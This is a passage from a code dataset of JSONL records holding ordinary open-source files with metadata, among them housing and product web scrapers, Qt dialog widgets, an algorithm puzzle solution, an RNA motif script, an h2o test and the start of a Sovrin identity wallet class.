"usage_type": "call"}, {"api_name": "custom.get_customizations_for", "line_number": 291, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 296, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 300, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 309, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 323, "usage_type": "call"}, {"api_name": "custom.reformat_block", "line_number": 326, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 400, "usage_type": "call"}, {"api_name": "bindings.wrap", "line_number": 401, "usage_type": "call"}, {"api_name": "bindings.init", "line_number": 442, "usage_type": "call"}, {"api_name": "bindings.model_builders", "line_number": 448, "usage_type": "call"}, {"api_name": "bindings.vprint", "line_number": 466, "usage_type": "call"}, {"api_name": "bindings.write_to_file", "line_number": 467, "usage_type": "call"}, {"api_name": "bindings.write_to_file", "line_number": 474, "usage_type": "call"}, {"api_name": "bindings.write_to_file", "line_number": 475, "usage_type": "call"}]} +{"seq_id": "24938136103", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom housing.items import HousingItem\nimport urllib.request\nimport json\n\n\nclass ShowMeTheRentSpider(scrapy.Spider):\n name = \"show_me_the_rent\"\n\n def __init__(self, *args, **kwargs):\n super(ShowMeTheRentSpider, self).__init__(*args, **kwargs)\n\n def start_requests(self):\n cities = ['Durham', 'Raleigh', 'ChapelHill']\n urls = 
['https://www.showmetherent.com/listings/' + c for c in cities]\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n\n for sel in response.xpath('//div[@class=\"listing-table\"]/div'):\n try:\n item = HousingItem()\n item['classification'] = trimSlashes(sel.xpath('.//div[@class=\"c3 listing-secondary\"]/p[@class=\"listing-numunits\"]/text()').extract_first())\n item['specs'] = sel.xpath('.//div[@class=\"c3 listing-secondary\"]/p[@class=\"listing-bedrooms\"]/text()').extract_first()\n item['pricePerMonth'] = stripPrice(sel.xpath('.//div[@class=\"c4 listing-rent-wrapper\"]/p[@class=\"listing-rent\"]/text()').extract_first())\n item['dateListed'] = trimSlashes(sel.xpath('.//div[@class=\"c3 listing-secondary\"]/p[@class=\"listing-lastupdate\"]/text()').extract_first())\n streetAddress = sel.xpath('.//div[@class=\"c2 listing-name\"]/h2/a/text()').extract_first()\n city = trimSlashes(sel.xpath('.//div[@class=\"c2 listing-name\"]/h3/text()').extract_first())\n item['address'] = streetAddress + ', ' + city\n item['url'] = 'www.showmetherent.com' + sel.xpath('.//div[@class=\"c2 listing-name\"]/h2/a/@href').extract_first()\n yield item\n except:\n pass\n\n nextPagesList = sel.xpath('//div[@class=\"page_bar\"]/a')\n next_page = nextPagesList[len(nextPagesList) - 1].xpath('.//@href').extract_first()\n if next_page is not None:\n next_page = \"https://www.showmetherent.com\" + next_page\n yield scrapy.Request(next_page, self.parse)\n\ndef trimSlashes(string):\n if any(c in string for c in ('\n', '\r', '\t', '\u00bd')):\n string = string.replace('\n', '').replace('\r', '').replace('\t', '').replace('\u00bd', '')\n string = string.rstrip().lstrip()\n return string\n\ndef stripPrice(string):\n if '-' in string:\n string = string[0:string.index('-')]\n string = string.replace('$', '').replace(',', '')\n return string\n\ndef representsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n", "repo_name": "hack-duke/hackduke-CEF", "sub_path": "scrapy-flask/housing/spiders/show_me_the_rent.py", "file_name": "show_me_the_rent.py", "file_ext": "py", "file_size_in_byte": 2606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 8, "usage_type": "attribute"}, {"api_name": "scrapy.Request", "line_number": 19, "usage_type": "call"}, {"api_name": "housing.items.HousingItem", "line_number": 25, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "41791626455", "text": "#!/usr/bin/python\n\nimport re\nfrom lxml import html\nimport requests\n\nfrom extract_data import Scraper\nfrom spiders_shared_code.snapdeal_variants import SnapdealVariants\n\n\nclass SnapdealScraper(Scraper):\n ##########################################\n ############### PREP\n ##########################################\n\n REVIEW_URL = 'https://www.snapdeal.com/review/stats/{product_id}'\n\n INVALID_URL_MESSAGE = \"Expected URL format is http(s)://www.snapdeal.com/product//\"\n\n def __init__(self, **kwargs):# **kwargs are presumably (url, bot)\n Scraper.__init__(self, **kwargs)\n\n self.sv = SnapdealVariants()\n\n def check_url_format(self):\n m = re.match(\"https?://www\\.snapdeal\\.com/product/.*\", self.product_page_url)\n return bool(m)\n\n def not_a_product(self):\n if self.tree_html.xpath(\"//meta[@property='og:type']/@content\")[0] != \"snapdeallog:item\":\n return True\n\n 
self.sv.setupCH(self.tree_html)\n\n return False\n\n ##########################################\n ############### CONTAINER : NONE\n ##########################################\n\n def _product_id(self):\n return self.product_page_url.split('/')[-1]\n\n ##########################################\n ############### CONTAINER : PRODUCT_INFO\n ##########################################\n\n def _product_name(self):\n return self.tree_html.xpath(\"//meta[@name='og_title']/@content\")[0].strip()\n\n def _product_title(self):\n return self._product_name()\n\n def _title_seo(self):\n return self._product_name()\n\n def _features(self):\n features = []\n\n features_td_list = self.tree_html.xpath(\"//table[@class='product-spec']//tr/td\")\n\n for index, td in enumerate(features_td_list):\n if (index + 1) % 2 != 0:\n continue\n\n features.append(features_td_list[index - 1].text_content() + \" \" + td.text_content())\n\n if features:\n return features\n\n def _description(self):\n short_description = None\n\n spec_title_list = self.tree_html.xpath(\"//h3[@class='spec-title']\")\n\n for spec_title in spec_title_list:\n if \"Highlights\" in spec_title.text_content():\n short_description = spec_title.xpath(\"./../following-sibling::div[@class='spec-body']\")[0].text_content().strip()\n break\n\n if short_description:\n return short_description\n\n def _long_description(self):\n long_description = self.tree_html.xpath(\"//div[@itemprop='description' and @class='detailssubbox']\")\n\n if long_description:\n return long_description[0].text_content().strip()\n\n def _variants(self):\n return self.sv._variants()\n\n ##########################################\n ############### CONTAINER : PAGE_ATTRIBUTES\n ##########################################\n \n def _image_urls(self):\n image_urls = self.tree_html.xpath(\"//div[@class='baseSliderPager']//img/@src\")\n lazy_image_urls = self.tree_html.xpath(\"//div[@class='baseSliderPager']//img/@lazysrc\")\n image_urls = image_urls + lazy_image_urls\n\n if not image_urls:\n image_urls = self.tree_html.xpath(\"//div[@id='bx-pager-left-image-panel']//img/@src\")\n lazy_image_urls = self.tree_html.xpath(\"//div[@id='bx-pager-left-image-panel']//img/@lazysrc\")\n image_urls = image_urls + lazy_image_urls\n\n if image_urls:\n return image_urls\n\n def _video_urls(self):\n iframe_list = self.tree_html.xpath(\"//iframe\")\n\n youtubu_iframes = []\n\n for iframe in iframe_list:\n if \"www.youtube.com\" in iframe.xpath(\"./@lazysrc\")[0]:\n youtubu_iframes.append(iframe)\n\n youtubu_urls = []\n\n for iframe in youtubu_iframes:\n youtubu_urls.append(iframe.xpath(\"./@lazysrc\")[0].strip())\n\n if youtubu_urls:\n return youtubu_urls\n\n ##########################################\n ############### CONTAINER : REVIEWS\n ##########################################\n\n def _reviews(self):\n if self.is_review_checked:\n return self.reviews\n\n self.is_review_checked = True\n\n product_id = self._product_id()\n\n review_content = requests.get(self.REVIEW_URL.format(product_id=product_id), timeout=10).text\n review_content = html.fromstring(review_content)\n rating_blocks = review_content.xpath(\"//div[@class='product_infogram']//div[contains(@class, 'row')]\")\n\n review_list = []\n max_review = None\n min_review = None\n\n for rating_block in rating_blocks:\n review_rate = int(rating_block.xpath(\".//span[contains(@class, 'lfloat')]/text()\")[0][0])\n review_count = int(rating_block.xpath(\".//span[contains(@class, 'barover')]/following-sibling::span/text()\")[0])\n 
review_list.append([review_rate, review_count])\n\n if not max_review:\n max_review = review_rate\n elif review_count > 0 and review_rate > max_review:\n max_review = review_rate\n\n if not min_review:\n min_review = review_rate\n elif review_count > 0 and review_rate < min_review:\n min_review = review_rate\n\n self.reviews = review_list\n self.average_review = float(self.tree_html.xpath(\"//span[@itemprop='ratingValue']/text()\")[0].strip())\n self.review_count = int(self.tree_html.xpath(\"//span[@itemprop='ratingCount']/text()\")[0].strip())\n self.max_review = max_review\n self.min_review = min_review\n\n return self.reviews\n\n ##########################################\n ############### CONTAINER : SELLERS\n ##########################################\n\n def _price(self):\n return '{} {}'.format(self._price_currency(), self.tree_html.xpath(\"//span[@itemprop='price']/text()\")[0])\n\n def _price_amount(self):\n price_amount = self.tree_html.xpath(\"//input[@id='productPrice']/@value\")[0]\n\n if str(int(price_amount)) == price_amount:\n return int(price_amount)\n else:\n return float(price_amount)\n\n def _price_currency(self):\n return 'Rs.'\n\n def _site_online(self):\n return 1\n\n def _in_stores(self):\n return 1\n\n def _site_online_out_of_stock(self):\n if self.tree_html.xpath(\"//div[@class='container-fluid inStockNotify reset-padding ']\"):\n return 1\n\n return 0\n\n ##########################################\n ############### CONTAINER : CLASSIFICATION\n ########################################## \n\n def _categories(self):\n return self.tree_html.xpath(\"//div[@class='containerBreadcrumb']//span[@itemprop='title']/text()\")\n\n def _brand(self):\n return self.tree_html.xpath(\"//input[@id='brandName']/@value\")[0]\n\n ##########################################\n ################ RETURN TYPES\n ##########################################\n\n # dictionaries mapping type of info to be extracted to the method that does it\n # also used to define types of data that can be requested to the REST service\n\n DATA_TYPES = { \\\n # CONTAINER : NONE\n \"product_id\" : _product_id, \\\n\n # CONTAINER : PRODUCT_INFO\n \"product_name\" : _product_name, \\\n \"product_title\" : _product_title, \\\n \"title_seo\" : _title_seo, \\\n \"features\" : _features, \\\n \"description\" : _description, \\\n \"long_description\" : _long_description, \\\n \"variants\": _variants,\n\n # CONTAINER : PAGE_ATTRIBUTES\n \"image_urls\" : _image_urls, \\\n \"video_urls\" : _video_urls, \\\n\n # CONTAINER : REVIEWS\n \"reviews\" : _reviews, \\\n\n # CONTAINER : SELLERS\n \"price\" : _price, \\\n \"price_amount\" : _price_amount, \\\n \"price_currency\" : _price_currency, \\\n \"site_online\": _site_online, \\\n \"site_online_out_of_stock\": _site_online_out_of_stock, \\\n \"in_stores\" : _in_stores, \\\n\n # CONTAINER : CLASSIFICATION\n \"categories\" : _categories, \\\n \"brand\" : _brand, \\\n }\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "special_crawler/extract_snapdeal_data.py", "file_name": "extract_snapdeal_data.py", "file_ext": "py", "file_size_in_byte": 8180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "extract_data.Scraper", "line_number": 11, "usage_type": "name"}, {"api_name": "extract_data.Scraper.__init__", "line_number": 21, "usage_type": "call"}, {"api_name": "extract_data.Scraper", "line_number": 21, "usage_type": "name"}, {"api_name": "spiders_shared_code.snapdeal_variants.SnapdealVariants", 
"line_number": 23, "usage_type": "call"}, {"api_name": "re.match", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 139, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 140, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 140, "usage_type": "name"}]} +{"seq_id": "26878373930", "text": "from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\n\n\nclass ModuleSeletorDialog(QtWidgets.QDialog):\n\n def __init__(self, modules_info, parent=None):\n self.modules_info = modules_info\n super(ModuleSeletorDialog, self).__init__(parent)\n self.setWindowFlags(QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)\n\n self.title = \"ASR - Module Select\"\n self.setWindowTitle(self.title)\n self.setModal(True)\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n\n self.screen_label = QtWidgets.QLabel(\"Select the modules:\")\n self.verticalLayout.addWidget(self.screen_label)\n\n self.parent_allmodule_hbox = QtWidgets.QHBoxLayout()\n self.parent_allmodule_hbox.setObjectName('parentlayout')\n self.parent_allmodule_hbox.insertSpacing(0, 40)\n\n self.allmodule_layout = QtWidgets.QVBoxLayout()\n self.allmodule_layout.insertSpacing(0, 10)\n self.allmodule_layout.setSpacing(6)\n self.allmodule_layout.setObjectName(\"allmodule_layout\")\n\n self.checkboxes = []\n self.add_module_checkboxes()\n\n self.parent_allmodule_hbox.addLayout(self.allmodule_layout)\n self.verticalLayout.addLayout(self.parent_allmodule_hbox)\n\n self.button_layout = QtWidgets.QHBoxLayout()\n self.button_layout.setAlignment(QtCore.Qt.AlignCenter)\n self.button_layout.setObjectName(\"button_layout\")\n\n self.box = QtWidgets.QDialogButtonBox()\n self.box.addButton(\"Next\", QtWidgets.QDialogButtonBox.AcceptRole)\n self.box.addButton(\"Cancel\", QtWidgets.QDialogButtonBox.RejectRole)\n\n self.nextButton = QtWidgets.QPushButton('Next')\n self.cancelButton = QtWidgets.QPushButton('Cancel')\n self.button_layout.addWidget(self.nextButton)\n self.button_layout.addWidget(self.cancelButton)\n\n #\n self.verticalLayout.addLayout(self.button_layout)\n\n self.nextButton.clicked.connect(self.accept)\n self.cancelButton.clicked.connect(self.reject)\n\n self.resize(400, 120)\n\n\n def add_module_checkboxes(self):\n modules = self.modules_info #modules_info list: [module_names]\n for module in modules:\n self.module_layout1 = QtWidgets.QVBoxLayout()\n self.module_layout1.setObjectName(\"module_layout1\")\n #Check box setup for a device\n self.module_checkbox = QtWidgets.QCheckBox(self)\n self.module_checkbox.setText(module)\n self.module_checkbox.setObjectName(\"module_checkbox\")\n self.module_layout1.addWidget(self.module_checkbox)\n self.allmodule_layout.addLayout(self.module_layout1)\n #self.module_checkbox.stateChanged.connect(self.)\n self.checkboxes.append(self.module_checkbox)", "repo_name": "Anand-Nakhate/Async-ASR", "sub_path": "async-asr-newWebSocket/utilities/ModuleSeletorDialog.py", "file_name": "ModuleSeletorDialog.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 5, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 10, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 10, "usage_type": "name"}, 
{"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialogButtonBox", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialogButtonBox", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialogButtonBox", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 45, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 62, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QCheckBox", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "38526033576", "text": "\nfrom PySide2 import (QtWidgets, QtCore, QtGui)\n\nclass DialogColumn(QtWidgets.QFrame):\n\t\n\tdef __init__(self):\n\t\t\n\t\tQtWidgets.QFrame.__init__(self)\n\t\t\n\t\tself.setLayout(QtWidgets.QVBoxLayout())\n\t\tself.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n\t\tself.layout().setContentsMargins(0, 0, 0, 0)\n\t\tself.layout().addStretch()\n\t\t\n#\t\tself.setStyleSheet(\"DialogColumn {border: 1px solid gray;}\")\n\t\n\tdef add_widget(self, widget):\n\t\t\n\t\tself.layout().insertWidget(self.layout().count() - 1, widget)\n", "repo_name": "demjanp/deposit_gui", "sub_path": "src/deposit_gui/view/vusertools_elements/dialog/dialog_column.py", "file_name": "dialog_column.py", "file_ext": "py", "file_size_in_byte": 522, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide2.QtWidgets.QFrame", "line_number": 4, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 4, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QFrame.__init__", "line_number": 8, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QFrame", "line_number": 8, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 8, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 10, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", 
"line_number": 10, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QSizePolicy", "line_number": 11, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "13873617409", "text": "import sys\nfrom collections import deque\n\nn, k = map(int, sys.stdin.readline().split())\narr = [[] for _ in range(n)]\ninp = list(map(int, sys.stdin.readline().split()))\nfor i in range(n):\n arr[i].append(inp[i])\nqueue = deque(arr)\n\ndef addFish():\n minA = min(queue)[0]\n # print(minA)\n for i in range(len(queue)):\n if queue[i][0] == minA:\n queue[i][0] += 1\n\n\ndef putOn():\n popleft = queue.popleft()\n for i in popleft:\n queue[0].append(i)\n # print(queue)\n\ndef airTurn():\n while True:\n until = -1\n for i in range(len(queue)-1, -1, -1):\n if len(queue[i]) >= 2:\n if len(queue)-1 - i < len(queue[i]):\n return\n until = i\n break\n tmp = deque()\n for i in range(until+1):\n popleft = queue.popleft()\n tmp.appendleft(popleft)\n\n for popleft in tmp:\n k = 0\n for i in popleft:\n queue[k].append(i)\n k += 1\n\ndef fishDivide():\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n\n tempArr = [[0] * (len(queue[0])) for _ in range(len(queue))]\n\n for x in range(len(queue)):\n for y in range(len(queue[x])):\n curr = queue[x][y]\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < len(queue) and 0 <= ny < len(queue[x]):\n # print(\"he\",x, y, len(queue), len(queue[x]))\n # print(nx, ny)\n try:\n gap = queue[nx][ny] - curr\n except:\n continue\n d = abs(gap) // 5\n # print(\"check\", x, y, nx, ny, d)\n if d > 0:\n if queue[nx][ny] > queue[x][y]:\n tempArr[nx][ny] -= d\n tempArr[x][y] += d\n else:\n tempArr[nx][ny] += d\n tempArr[x][y] -= d\n\n for x in range(len(tempArr)):\n for y in range(len(tempArr[x])):\n try:\n queue[x][y] += (tempArr[x][y] // 2)\n except:\n continue\n\ndef reLine():\n tmp = []\n while queue:\n popleft = queue.popleft()\n for j in popleft:\n tmp.append(j)\n\n for i in tmp:\n queue.append([i])\n\ndef turnHalf():\n\n for _ in range(2):\n length = len(queue) // 2 - 1\n tmp = deque()\n i = 0\n while i <= length:\n popleft = queue.popleft()\n t = []\n while popleft:\n pop = popleft.pop()\n t.append(pop)\n tmp.appendleft(t)\n i += 1\n\n k = 0\n for node in tmp:\n for j in node:\n queue[k].append(j)\n k += 1\n\n\n\ncnt = 0\nwhile max(queue)[0] - min(queue)[0] > k:\n cnt += 1\n addFish()\n # print(queue)\n putOn()\n # print(queue)\n airTurn()\n # print(queue)\n fishDivide()\n # print(queue)\n reLine()\n # print(queue)\n turnHalf()\n # print(queue)\n fishDivide()\n # print(queue)\n reLine()\n # print(queue)\n\nprint(cnt)", "repo_name": "whiskey21/my-algorithm-book", "sub_path": "삼성A형/어항정리.py", "file_name": "어항정리.py", "file_ext": "py", "file_size_in_byte": 3226, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin.readline", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 34, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "38141783219", "text": "#!/usr/bin/python\n\nimport sqlite3\n\ndef connect():\n conn = sqlite3.connect('bot_db.db')\n 
define_table(conn)\n return conn\n\n\ndef define_table(conn):\n conn.execute('''\n CREATE TABLE IF NOT EXISTS HOUSE\n (ID INTEGER PRIMARY KEY,\n TIMESTAMP TEXT NOT NULL,\n PRICE TEXT NOT NULL,\n ADDRESS TEXT,\n URL TEXT);''')\n print(\"Table created successfully\")\n\n\ndef backup(conn, data):\n for d in data:\n conn.execute(\"INSERT INTO HOUSE (TIMESTAMP, PRICE, ADDRESS, URL) VALUES (?, ?, ?, ?)\",\n (d.date, d.price, d.address, d.url))\n\n conn.commit()\n print(\"Records backed up\")\n", "repo_name": "kevind992/daft-bot", "sub_path": "daft-bot/database/sqlite.py", "file_name": "sqlite.py", "file_ext": "py", "file_size_in_byte": 719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "4751458881", "text": "import pandas as pd\nimport sys\nimport argparse\nimport glob\n\nfrom rnamake import resource_manager as rm\nfrom rnamake import motif_ensemble, vienna, util\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-pdb_dir', help='directory of pdbs', required=True)\n parser.add_argument('-weights', help='directory of pdbs')\n\n args = parser.parse_args()\n\n return args\n\ndef build_me_sub(org_m, new_motifs, scores, extra_mse_file=\"test.dat\"):\n f = open(extra_mse_file, \"w\")\n\n for i, end in enumerate(org_m.ends):\n all_ms = []\n all_scores = []\n\n for j, new_m in enumerate(new_motifs):\n try:\n mi = rm.manager.get_motif(name=new_m.name, end_name=new_m.ends[i].name())\n except:\n continue\n\n try:\n mi.to_str()\n except:\n continue\n\n all_ms.append(mi)\n all_scores.append(scores[j])\n\n me = motif_ensemble.MotifEnsemble()\n me.setup(org_m.end_ids[i], all_ms, all_scores)\n org_m_key = org_m.name + \"-\" + end.name()\n\n f.write(org_m_key + \"!!\" + me.to_str() + \"\\n\")\n\n\n f.flush()\n f.close()\n\ndef parse_weights_file(weights_file):\n f = open(weights_file)\n lines = f.readlines()\n f.close()\n\n d = {}\n for l in lines:\n spl = l.split()\n if len(spl) < 2:\n continue\n d[spl[0]] = float(spl[1])\n return d\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n name = \"test_motif\"\n\n pdbs = glob.glob(args.pdb_dir + \"/*.pdb\")\n motifs = []\n scores = []\n\n start_m = rm.manager.get_structure(pdbs[0], name)\n\n # needs a new motif name for RNAMAke to recognize this sequence / secondary structure\n org_m = start_m\n needs_new_motif = False\n try:\n m = rm.manager.get_motif(end_id=start_m.end_ids[0])\n org_m = m\n except:\n needs_new_motif = True\n\n score_dict = {}\n if args.weights:\n score_dict = parse_weights_file(args.weights)\n\n for pdb in pdbs:\n pdb_name = util.filename(pdb)\n rm.manager.add_motif(pdb, name=pdb_name, remove_extra_bps=1)\n\n if pdb_name in score_dict:\n scores.append(score_dict[pdb_name])\n else:\n scores.append(1)\n\n motifs.append(rm.manager.get_motif(name=pdb_name))\n\n build_me_sub(org_m, motifs, scores)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "jyesselm/SimulateTectos", "sub_path": "simulate_tectos/bin/build_motif_ensemble_from_pdbs.py", "file_name": "build_motif_ensemble_from_pdbs.py", "file_ext": "py", "file_size_in_byte": 2406, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 27, 
"usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 27, "usage_type": "name"}, {"api_name": "rnamake.motif_ensemble.MotifEnsemble", "line_number": 39, "usage_type": "call"}, {"api_name": "rnamake.motif_ensemble", "line_number": 39, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 68, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager.get_structure", "line_number": 72, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 72, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 72, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 78, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 78, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 78, "usage_type": "name"}, {"api_name": "rnamake.util.filename", "line_number": 88, "usage_type": "call"}, {"api_name": "rnamake.util", "line_number": 88, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.add_motif", "line_number": 89, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 89, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 89, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 96, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 96, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "13350638374", "text": "#!/usr/bin/env python\nimport h2o\nfrom tests import pyunit_utils\n\ndef test_4673():\n fr = h2o.import_file(pyunit_utils.locate(\"smalldata/iris/iris_wheader.csv\"))\n # If this didn't throw an exception in Python 3.6, then we're good.\n print(fr.mean())\n fr.apply(lambda x: x[\"class\"] + x[0], axis=1).show()\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_4673)\nelse:\n test_4673()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_jira/pyunit_pubdev_4673.py", "file_name": "pyunit_pubdev_4673.py", "file_ext": "py", "file_size_in_byte": 408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "h2o.import_file", "line_number": 6, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 6, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 6, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 13, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "10315670018", "text": "import datetime\nimport json\nimport operator\nfrom collections import deque\nfrom typing import Dict, List\nfrom typing import Optional\n\nfrom ledger.util import F\nfrom plenum.client.wallet import Wallet as PWallet\nfrom plenum.common.did_method import DidMethods\nfrom plenum.common.log import getlogger\nfrom plenum.common.txn import TXN_TYPE, TARGET_NYM, DATA, \\\n IDENTIFIER, NYM, ROLE, VERKEY, NODE\nfrom plenum.common.types import Identifier, f\n\nfrom sovrin.client.wallet.attribute import Attribute, AttributeKey\nfrom sovrin.client.wallet.link import Link\nfrom sovrin.client.wallet.node import Node\nfrom 
sovrin.client.wallet.sponsoring import Sponsoring\nfrom sovrin.client.wallet.upgrade import Upgrade\nfrom sovrin.common.did_method import DefaultDidMethods\nfrom sovrin.common.exceptions import LinkNotFound\nfrom sovrin.common.identity import Identity\nfrom sovrin.common.txn import ATTRIB, GET_TXNS, GET_ATTR, GET_NYM, POOL_UPGRADE\n\nENCODING = \"utf-8\"\n\nlogger = getlogger()\n\n\n# TODO: Maybe we should have a thinner wallet which should not have ProverWallet\nclass Wallet(PWallet, Sponsoring):\n clientNotPresentMsg = \"The wallet does not have a client associated with it\"\n\n def __init__(self,\n name: str,\n supportedDidMethods: DidMethods=None):\n PWallet.__init__(self,\n name,\n supportedDidMethods or DefaultDidMethods)\n Sponsoring.__init__(self)\n self._attributes = {} # type: Dict[(str, Identifier,\n # Optional[Identifier]), Attribute]\n\n self._nodes = {}\n self._upgrades = {}\n\n self._links = {} # type: Dict[str, Link]\n self.knownIds = {} # type: Dict[str, Identifier]\n\n # transactions not yet submitted\n self._pending = deque() # type Tuple[Request, Tuple[str, Identifier,\n # Optional[Identifier]]\n\n # pending 